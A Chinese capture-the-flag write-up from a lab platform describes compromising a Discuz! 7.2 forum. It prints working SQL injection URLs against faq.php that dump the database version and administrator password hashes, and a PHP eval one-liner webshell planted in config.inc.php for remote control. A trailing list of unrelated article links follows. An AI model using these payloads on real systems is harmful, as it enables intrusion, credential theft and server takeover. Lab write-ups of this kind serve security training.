实验吧_网站综合渗透_Discuz!

article/2025/8/29 3:31:42

前言

这个一个实验吧中的环境,分值为50分,下面是题目说明。诶,发现自己很菜。
实验吧_网站综合渗透_dedecms解析地址

需要的学会或者已经掌握的知识

  1. 已知cms版本在线搜索通用漏洞
  2. 掌握菜刀或者类似的工具的使用
  3. 其他

题目说明

你是国内一流安全公司的“安全专家”,你带领的团队负责维护国内某金融网站的安全,马上临近双十一购物节,客户要求你对重点保障网站进行“授权安全检查”,希望你能找到网站的漏洞。
操作机器IP:192.168.1.2
目标机器IP:192.168.1.3

1、 在不影响客户业务的前提下,你对网站进行了“应用安全”扫描,你通过扫描发现网站存在SQL注入漏洞,你为了排除扫描器误报的可能性,你需要进行手工验证。
要求验证SQL注入的过程:
1)注入过程中使用的黑客命令
2)成功登陆网站后台的管理界面
完成以上步骤后,找到key1与kye2,可将key提交到平台得分。

2、通过手工验证,你证实了网站存在SQL注入漏洞,并能通过此漏洞获取到网站的管理员账号信息,你为了让客户重视危害,在客户授权的前提下进行了“上传shell”的操作。
要求你通过网站漏洞,通过安全技术将“webshell”上传到服务器。
需要你完成:
1)通过漏洞上传“webshell”。
完成以上步骤后,找到key4与key5,可将key提交到平台得分。

3、你将你的发现报告给了客户,客户非常认同你的专业知识水平,希望你可以利用上面的发现进一步的对网站所处的服务器进行安全测试,找到更多的漏洞。
需要你完成:
利用上面的成果对服务器进行“提取”、“远程连接”。
完全控制服务器。
完成以上步骤后,找到key5,可将key5提交到平台得分。

正文

首先访问192.168.1.3,发现是一个基于Discuz!7.2的论坛网站。
首页
通过百度等搜索引擎搜索这个版本的通用漏洞,发现存在一个sql注入漏洞,以下是payload。

http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

然后利用这个payload验证目标网站是否已经修补这个漏洞。
爆数据库版本号:

192.168.1.3/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

在这里插入图片描述
紧接着就是爆数据库管理员的用户名和密码

192.168.1.3/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(username,0x7e7e,password,0x7e7e) from cdb_members limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

在这里插入图片描述
其中的密码的hash可以通过下面的操作转明文,得到密码simple123.接着去找登录的后台界面登录。
在这里插入图片描述
第一个key1在管理中心–>站点信息–>全局的这个框框中
在这里插入图片描述
进入后台之后,接着就是找木马上传点。维持权限啊喂。
通过本地代码审计,发现这个地方可上传一句话。
在这里插入图片描述
一句话构造,记得密码不带引号,引号需要转移,否则服务会死。

xx\');eval($_POST[jedi]);?>\\

在这里插入图片描述
提交保存之后,使用菜刀连接,特别注意的是,链接的地址是xxxxx/config.inc.php
在这里插入图片描述
连接上了之后第一件事就是找配置文件。记录配置文件的密码和配置信息。
在这里插入图片描述
发现数据库配置,接着去连接数据库,即可查询另一个账号的密码,即key2

在这里插入图片描述
在这里插入图片描述
编辑后保存,连接数据库。发现三个加密后的密码值。其中的第二个就是key2(需要获取明文).

在这里插入图片描述
然后在数据库中又发现了key3
在这里插入图片描述
然后在文件管理中发现key4的压缩包,首先是下载下来。发现解压不了,然后注意到大小仅为80,所以直接使用sublime打开。得到一串十六进制的字符串,使用hackbar先十六进制再base64解码即可。
在这里插入图片描述
最后在桌面中发现最后一共key5.这里好像有点问题没有题目要求的提权,webshell的权限好像高了。

在这里插入图片描述

后言

首先这篇博文有一部分参考了别人的writeup,其次如果写的有问题的可以留言。感谢实验吧的提供的环境,但是也要吐槽一下,希望实验吧添加一些功能,比如共享剪切板。


http://chatgpt.dhexx.cn/article/kPeXXtVS.shtml

相关文章

实验吧-简单的登录题——WriteUp再研究

实验吧-简单的登录题——WriteUp再研究

前言 这个题目的难点就是在于对于CBC加密方式尤其是解密这部分要琢磨一番,让我想起当年大学的时候信安三勇中的两勇的课,一门密码学,一门数学基础,可怕之极。这个题网上writeup一大堆,但是在一些方面解释的不是很详细…
阅读更多...
实验吧-简单的登录题

实验吧-简单的登录题

前言 这是在实验吧上面的一道web题。主要考察cbc字节反转攻击。 分析 题目开始就是输入id去登录 首先想到的就是sql注入了,输入1后页面显示Hello,重新载入的话页面返回报错信息 确实存在注入,看那后面的逗号,猜测注入点在limit后面。然后试了很多,发现题目把union,#…
阅读更多...
前端框架是什么意思?

前端框架是什么意思?

说起前端框架,很多人都不知道是什么意思,下面本篇文章就来给大家介绍一下前端框架是什么意思?希望对大家有所帮助。 前端框架是什么意思? 前端框架一般指用于简化网页设计的框架,使用广泛的前端开发套件,比…
阅读更多...
优秀的前端开发框架

优秀的前端开发框架

优秀的前端开发框架 1.Vue Vue2文档:Vue.js Vue3文档:Vue.js - 渐进式 JavaScript 框架 | Vue.js 用于构建用户界面的渐进式框架 Vue的核心库只关注视图层。可与elementUI配合Element - The worlds most popular Vue UI framework 2.React 原先的Fa…
阅读更多...
matplotlib 绘图 显示中文

matplotlib 绘图 显示中文

参考: Matplotlib中正确显示中文的四种方式 在 matplotlib 中无法直接显示中文(比如使用: plt.xlabel(), plt.ylabel, plt.title()等) from matplotlib import pyplot as pltplt.plot(np.arange(5)) plt.xlabel(x 标签) plt.ylabel(y 标签) plt.title(标题) plt.show()运行上述…
阅读更多...
Matplotlib入门:等高线图contour

Matplotlib入门:等高线图contour

import matplotlib.pyplot as plt import numpy as npdef f(x,y):return (1-x/2x**5y**3)*np.exp(-x**2-y**2)n 256 x np.linspace(-3,3,n) y np.linspace(-3,3,n)# 生成网格 X,Y np.meshgrid(x,y)# contourf 会在等高线之间进行填充 plt.contourf(X,Y,f(X,Y),8,alpha0.75,…
阅读更多...
matplotlib设置坐标轴

matplotlib设置坐标轴

import numpy as np设置x,y范围 x np.linspace(-3,3,100) y1 2*x 1 y2 x**2#xy范围 plt.xlim((-1,2)) plt.ylim((-2,3))plt.plot(x,y1,colorred,linewidth1.0,linestyle--) plt.plot(x,y2,colorblue,linewidth5.0,linestyle-) #color指的是线的颜色,linewidth指…
阅读更多...
python安装matplotlib画图模块

python安装matplotlib画图模块

在python中会使用很多图标的东西作为可视化输出的必不可少的内容。matplotlib提供了很好的图形化显示。 下面就如何快速安装matplotlib做一下简要的说明: 博主用的python版本是3.8.2 win R 输入 python 一般情况下我们用pip安装一些python模块的时候都会提示 先升…
阅读更多...
Python Matplotlib 绘制表格

Python Matplotlib 绘制表格

Python Matplotlib 绘制表格 ​ 最近因为开发一个项目,需要用到Matplotlib绘制一些图片和表格,网上找到的一些,感觉总差点意思,绘制个表格感觉有点过于麻烦,因此自己整理了下。 ​ 绘制方法直接使用Matplotlib绘制&a…
阅读更多...
Matplotlib快速入门

Matplotlib快速入门

1. Matplotlib 常用模块 Matplotlib 库中主要包含两个重要模块 pyplob 和 pylab。pyplot 是 Matplotlib 中的一个重要模块,在后续教程中,我们会经常使用 pyplot,该模块允许我们自动、隐式地创建图形及其轴,以实现所需的绘图&…
阅读更多...
Matplotlib之Figure的使用

Matplotlib之Figure的使用

Matplotlib之Figure的使用 意义实现方法代码实例现象 拓展(图像参数设置)图像的展现曲线的展现代码及现象 意义 figure是画图的窗口,本文主要解决我们想多个窗口显示多样的数据时的问题 实现方法 代码实例 下面展示一些 内联代码片。 im…
阅读更多...
matplotlib隐藏坐标轴

matplotlib隐藏坐标轴

1. 隐藏x坐标轴 import matplotlib.pyplot as pltx [3, 4, 4, 6, 7, 8, 8, 12] y [11, 12, 12, 14, 17, 15, 14, 19]fig, ax plt.subplots(figsize(6, 6), dpi100)ax.scatter(x, y) # 显示辅助线 ax.grid(True) # 1. 隐藏x坐标轴 ax.get_xaxis().set_visible(False) fig.sh…
阅读更多...
Matplotlib的颜色

Matplotlib的颜色

Matplotlib的颜色 下面是一段代码示例: plt.figure() plt.rcParams[font.family] [SimHei] x [男, 女] y1 [923, 1013] y2 [1393, 1741] plt.bar(range(2), y1, width0.2, facecolorred, label糖尿病患者) plt.bar([i0.2 for i in range(2)], y2, width0.2, …
阅读更多...
matplotlib

matplotlib

今天我们来介绍一下python的一个可视化工具matplotlib matplotlib 使用matplotlib的方式有很多,但最通常的是Pylab模式的ipython(-ipython –pylab) matplotlib的api都位于matplotlib.pyplot中,所以一般的引入方式为: import matplotlib.…
阅读更多...
Matplotlib绘制动图

Matplotlib绘制动图

简介 Matplotlib是非常著名的Python绘图库,支持非常复杂的底层定制化操作。本文通过Matplotlib中的动画绘制工具来讲解如何绘制动态图,首先讲解通过交互模式如何显示动态图,继而讲解通过两个动画类来实现动图地保存(GIF格式&…
阅读更多...
python使用matplotlib绘图

python使用matplotlib绘图

文章目录 一、模块介绍二、模块安装三、主要API介绍设置绘图风格plt.style.use()新建画布plt.figure()绘制折线图plt.plot()绘制垂直柱状图plt.bar()绘制水平柱状图plt.barh()绘制饼状图plt.pie()绘制散点图plt.scatter()设置横纵坐标的标签plt.xlabel(), plt.ylabel()添加文字…
阅读更多...
零基础学Python:Matplotlib用法

零基础学Python:Matplotlib用法

本文目录: 一、初识matplotlib二、线形图plot()函数用法 三、散点图scatter()函数用法 四、饼状图pie()函数用法 五、直方图hist()函数用法 前言: 📢📢📢 🏅&…
阅读更多...
Matplotlib库的介绍及使用

Matplotlib库的介绍及使用

Matplotlib库的介绍及使用 1. pyplot子库的基本使用1.1 Matplotlib库的介绍1.2 plot函数1.3 pyplot的中文显示1.4 pyplot的文本显示 2. pyplot基础图表函数2.1 pyplot饼图的绘制2.2 pyplot直方图的绘制2.3 pyplot极坐标图的绘制2.4 pyplot散点图的绘制 1. pyplot子库的基本使用…
阅读更多...
【Python数据分析】Matplotlib的初步认识

【Python数据分析】Matplotlib的初步认识

文章目录 1.什么是Matplotlib2.常见图形种类及意义1.折线图2.散点图3.柱状图4.直方图5.饼图 3.认识Matplotlib图像结构1.第一层2.第二层3.第三层 4.折线图初体验1.设置标题2.中文显示3.自定义X轴刻度4.一图多线5.一图多个坐标系子图 1.什么是Matplotlib Matplotlib是一个Pytho…
阅读更多...
使用Matplotlib绘图

使用Matplotlib绘图

🤵 Author :Horizon Max ✨ 编程技巧篇:各种操作小结 🎇 机器视觉篇:会变魔术 OpenCV 💥 深度学习篇:简单入门 PyTorch 🏆 神经网络篇:经典网络模型 💻 …
阅读更多...
推荐文章

Copyright @ 2022~2023